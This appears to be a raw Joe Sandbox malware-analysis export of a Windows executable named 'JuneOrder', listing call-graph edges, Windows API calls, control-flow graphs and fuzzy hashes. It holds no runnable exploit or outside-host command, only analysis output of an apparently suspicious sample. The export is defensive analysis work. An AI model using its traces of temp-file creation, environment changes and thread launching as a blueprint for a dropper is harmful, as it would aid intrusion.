9825->9827 9829 4065f7 9826->9829 9830 4065eb free 9826->9830 9827->9826 9828->9825 9832 406625 wcsncpy 9828->9832 9829->9807 9831 4065fe free 9829->9831 9830->9829 9831->9807 9832->9828 9834 40aac0 15 API calls 9833->9834 9835 40243f 9834->9835 9835->9666 9836 40af80 9835->9836 9837 40d459 2 API calls 9836->9837 9838 40af8f 9837->9838 9839 40afa3 9838->9839 9842 40ae80 9838->9842 9839->9664 9841 40afa0 9841->9664 9843 40af74 9842->9843 9844 40ae94 9842->9844 9843->9841 9844->9843 9845 40aea8 9844->9845 9846 40af0d 9844->9846 9848 40aee0 9845->9848 9849 40aeb8 9845->9849 9860 40b130 WideCharToMultiByte 9846->9860 9848->9848 9850 40aeeb WriteFile 9848->9850 9853 40b020 4 API calls 9849->9853 9850->9841 9851 40af27 9852 40af6b 9851->9852 9854 40af37 9851->9854 9855 40af48 WriteFile 9851->9855 9852->9841 9856 40aeda 9853->9856 9857 40b020 4 API calls 9854->9857 9858 40af5c HeapFree 9855->9858 9856->9841 9859 40af42 9857->9859 9858->9852 9859->9858 9861 40b155 HeapAlloc 9860->9861 9862 40b18e 9860->9862 9863 40b189 9861->9863 9864 40b16c WideCharToMultiByte 9861->9864 9862->9851 9863->9851 9864->9863 10167->7796 10168->7798 10169->7800 10170->7802 10171->7806 10172->7812 10173->7814 10174->7816 10175->7818 10176->7822 10177->7830 10178->7836 10179->7838 10180->7845 10181->7847 10182->7849 10183->7851 10184->7855 10185->7861 10186->7863 10187->7865 10188->7867 10189->7871 10190->7877 10191->7883 10192->7889 10193->7891 10194->7897 10195->7903 10453 406289 10454 406290 10453->10454 10454->10454 10457 40e3f0 TlsGetValue 10454->10457 10456 4062b5 10457->10456 10196 40b020 10197 40b127 10196->10197 10198 40b03a 10196->10198 10199 40b040 SetFilePointer 10198->10199 10200 40b06b 10198->10200 10199->10200 10202 40aa40 WriteFile 10200->10202 10204 40b077 10200->10204 10201 40b0a7 10203 40b0ee 10202->10203 10203->10204 10205 40b0f5 WriteFile 10203->10205 10204->10201 10206 40b091 memcpy 10204->10206 10616 401f3b 10617 40dfc0 21 API calls 10616->10617 10618 401f43 10617->10618 10639 40de80 GetLastError TlsGetValue SetLastError 10618->10639 10620 401f49 10640 40de80 GetLastError TlsGetValue SetLastError 10620->10640 10622 401f5a 10623 40e020 4 API calls 10622->10623 10624 401f62 10623->10624 10641 40de80 GetLastError TlsGetValue SetLastError 10624->10641 10626 401f68 10642 40de80 GetLastError TlsGetValue SetLastError 10626->10642 10628 401f70 10643 409b10 10628->10643 10632 401f7d 10647 405182 TlsGetValue 10632->10647 10634 401f88 10635 408e27 20 API calls 10634->10635 10636 401f91 10635->10636 10637 4051a0 3 API calls 10636->10637 10638 401f96 10637->10638 10638->10638 10639->10620 10640->10622 10641->10626 10642->10628 10648 409aa0 10643->10648 10646 40e080 TlsGetValue 10646->10632 10647->10634 10649 409ab0 10648->10649 10650 40e260 3 API calls 10649->10650 10651 401f77 10650->10651 10651->10646 10207 4011bf 10234 405379 EnterCriticalSection 10207->10234 10209 4011c4 10220 409950 SetUnhandledExceptionFilter 10209->10220 10211 4011c9 10221 40a6b5 10211->10221 10217 4011d8 10233 409b30 HeapDestroy 10217->10233 10219 4011dd 10220->10211 10222 4011ce 10221->10222 10223 40a6be 10221->10223 10225 40aa90 10222->10225 10224 40d9f5 2 API calls 10223->10224 10224->10222 10226 40d9f5 2 API calls 10225->10226 10227 4011d3 10226->10227 10228 40d2c4 10227->10228 10229 40d2d1 10228->10229 10230 40d2d2 10228->10230 10229->10217 10231 40d2e7 10230->10231 10232 40d2db TlsFree 10230->10232 10231->10217 10232->10231 10233->10219 10235 4053b2 LeaveCriticalSection 10234->10235 10236 40538f 10234->10236 10235->10209 10237 405390 CloseHandle 10236->10237 10239 4053b1 10236->10239 10238 40db32 HeapFree 10237->10238 10238->10236 10239->10235

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                          • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02250000,00000000,?,?), ref: 0040E2C7
                                        • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
                                        • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
                                        • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                        • String ID: GetLongPathNameW$Kernel32.DLL
                                        • API String ID: 820969696-2943376620
                                        • Opcode ID: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                        • Instruction ID: 045e3bd93f30ce5257affd3ba06db84d60efd2c3f80f990f00f7183b84a9fd71
                                        • Opcode Fuzzy Hash: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                        • Instruction Fuzzy Hash: C0F0BE722052147FC2212BBAAC4CDAB3E7CDE96752700413AF905E2252EA79881082BD

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
                                        • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
                                        • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02250000,00000000,?,?), ref: 0040DF1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                        • String ID: $pA$$pA$$pA$$pA
                                        • API String ID: 368575804-1531182785
                                        • Opcode ID: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
                                        • Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
                                        • Opcode Fuzzy Hash: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
                                        • Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0040100F
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                          • Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                          • Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                          • Part of subcall function 00409B40: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                          • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                                          • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                                          • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                          • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                                          • Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0
                                        • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                          • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                          • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                          • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                          • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
                                          • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
                                          • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B
                                          • Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
                                          • Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370
                                          • Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                          • Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                          • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                          • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                          • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                        • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011A5
                                        • HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
                                        • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonControlsDestroyEnumInitLoadModuleResourceTypes
                                        • String ID: .pA$:pA
                                        • API String ID: 3272620648-1142403416
                                        • Opcode ID: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
                                        • Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
                                        • Opcode Fuzzy Hash: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
                                        • Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 145 403df3-403df4 146 403df9-403e04 145->146 146->146 147 403e06-403e1c call 40dfc0 146->147 150 403e1e-403e26 147->150 151 403e28-403e8a call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 150->151 152 403e8c-403e9d 150->152 151->150 151->152 153 403e9f-403ea7 152->153 156 403ea9-403f0b call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 153->156 157 403f0d-403f1e 153->157 156->153 156->157 160 403f20-403f28 157->160 163 403f2a-403f8c call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 160->163 164 403f8e-403f9f 160->164 163->160 163->164 168 403fa1-403fa9 164->168 172 403fab-40400d call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 168->172 173 40400f-404020 168->173 172->168 172->173 178 404022-40402a 173->178 183 404090-4040a1 178->183 184 40402c-404086 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 178->184 190 4040a3-4040ab 183->190 303 40408b-40408e 184->303 196 404115-404126 190->196 197 4040ad-404113 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 190->197 204 404128-404130 196->204 197->190 197->196 205 404132-404198 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 204->205 206 40419a-4041ab 204->206 205->204 205->206 215 4041ad-4041b5 206->215 224 4041b7-404215 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 215->224 225 40421f-404230 215->225 330 40421a-40421d 224->330 235 404232-40423a 225->235 245 4042a4-4044ef call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 403275 call 40dec0 call 40985e GetModuleHandleW call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 40de80 * 4 call 40d100 call 405182 call 405eb0 call 40dec0 call 402e9d call 40de80 call 4021a4 call 4051a0 call 40195b call 40460e call 40de80 call 405100 call 40358d call 40dec0 PathRemoveBackslashW call 40213e call 40de80 * 2 call 402bfa call 40e080 call 405182 call 4098c0 call 4051a0 call 40de80 call 40e020 * 2 call 40dec0 call 40de80 call 401e55 call 40dec0 call 403855 call 40de80 call 40e020 call 40dec0 PathQuoteSpacesW call 40de80 call 40e020 * 3 call 40dec0 PathQuoteSpacesW 235->245 246 40423c-4042a2 call 40de80 * 2 call 405dc0 call 40dec0 call 40de80 call 40e020 * 2 call 40dec0 235->246 437 4044f1-404507 call 405492 245->437 438 404509-40450d call 402ca9 245->438 246->235 246->245 303->178 303->183 330->215 330->225 441 404512-40460d call 40de80 * 2 call 40e020 * 3 call 40e080 call 40de80 * 2 call 40a7f5 call 40e080 call 40de80 call 40e020 * 2 call 405182 * 3 call 402022 call 4051a0 call 401fa9 call 40df50 * 10 437->441 438->441
                                        APIs
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02250000,00000000,?,?), ref: 0040DF1C
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02259F70,00000000,00000000), ref: 004042FB
                                        • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                          • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(02259F70,02259F70,00002710), ref: 00402C34
                                          • Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                          • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNEL32(02259F70,02259F70,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                          • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02259F70,02258968,00000000,00000000), ref: 00401E8A
                                        • PathQuoteSpacesW.SHLWAPI(00000000,00000001,022589E8,00000000,00000000,00000000,00000000,00000000,02259F70,02258968,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
                                        • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,022589E8,00000000,00000000,00000000,00000000,00000000,02259F70,02258968), ref: 004044E1
                                          • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02259F70), ref: 004054AB
                                          • Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                          • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                          • Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                          • Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                        • String ID: *pA$*pA$pA
                                        • API String ID: 1881381519-978732049
                                        • Opcode ID: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
                                        • Instruction ID: c37fc5d70f496ddafb25d76fc072764247fdd107690a54ecab0fee76e679e4b9
                                        • Opcode Fuzzy Hash: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
                                        • Instruction Fuzzy Hash: 452219B5504700AED200BBB2D981A7F77BDEB94709F10CD3FF544AA192CA3CD8499B69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 510 40aac0-40aad6 511 40aae0-40aaf3 call 40d498 510->511 512 40aad8 510->512 515 40aca2-40acab 511->515 516 40aaf9-40ab00 511->516 512->511 517 40ab02-40ab0a 516->517 518 40ab3e-40ab41 516->518 519 40ab11-40ab17 517->519 520 40ab0c 517->520 521 40ab43-40ab4b 518->521 522 40ab7c-40ab7f 518->522 525 40ab19 519->525 526 40ab1c-40ab39 CreateFileW 519->526 520->519 527 40ab52-40ab58 521->527 528 40ab4d 521->528 523 40ab81-40ab8d 522->523 524 40abe8 522->524 531 40ab98-40ab9e 523->531 532 40ab8f-40ab94 523->532 533 40abec-40abef 524->533 525->526 526->533 529 40ab5a 527->529 530 40ab5d-40ab7a CreateFileW 527->530 528->527 529->530 530->533 534 40aba0-40aba3 531->534 535 40aba7-40abc7 CreateFileW 531->535 532->531 536 40abf5-40abf7 533->536 537 40ac8b 533->537 534->535 535->536 538 40abc9-40abe6 CreateFileW 535->538 536->537 540 40abfd-40ac04 536->540 539 40ac8f-40ac92 537->539 538->533 541 40ac94 539->541 542 40ac96-40ac9d call 40d40a 539->542 543 40ac22 540->543 544 40ac06-40ac0c 540->544 541->542 542->515 545 40ac25-40ac52 543->545 544->543 547 40ac0e-40ac20 HeapAlloc 544->547 548 40ac70-40ac79 545->548 549 40ac54-40ac5a 545->549 547->545 551 40ac7b 548->551 552 40ac7d-40ac7f 548->552 549->548 550 40ac5c-40ac6a SetFilePointer 549->550 550->548 551->552 552->539 553 40ac81-40ac8a 552->553
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
                                        • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
                                        • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
                                        • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
                                        • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: File$Create$AllocHeapPointer
                                        • String ID:
                                        • API String ID: 4207849991-0
                                        • Opcode ID: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                        • Instruction ID: b1ded5e7b3c1179952fb066da43177db28dec5f90817629197f40925782b5e59
                                        • Opcode Fuzzy Hash: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                        • Instruction Fuzzy Hash: 1F51C0712483006BE3218F19DD44B6B7BF6EB44764F204A3AFA51A73E0D678EC55874A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 554 40d819-40d838 555 40d83a-40d83c 554->555 556 40d83e-40d840 554->556 555->556 557 40d8f2-40d905 RtlAllocateHeap 556->557 558 40d846-40d869 call 40da43 EnterCriticalSection 556->558 560 40d907-40d925 557->560 561 40d93d-40d943 557->561 565 40d877-40d879 558->565 563 40d930-40d937 InitializeCriticalSection 560->563 564 40d927-40d929 560->564 563->561 564->563 566 40d92b-40d92e 564->566 567 40d86b-40d86e 565->567 568 40d87b 565->568 566->561 569 40d870-40d873 567->569 570 40d875 567->570 571 40d887-40d89b HeapAlloc 568->571 569->570 572 40d87d-40d885 569->572 570->565 573 40d8e5-40d8f0 LeaveCriticalSection 571->573 574 40d89d-40d8b8 call 40d819 571->574 572->571 572->573 573->561 574->573 577 40d8ba-40d8da 574->577 578 40d8dc 577->578 579 40d8df 577->579 578->579 579->573
                                        APIs
                                        • EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,77435E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
                                        • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
                                        • LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
                                        • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,77435E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
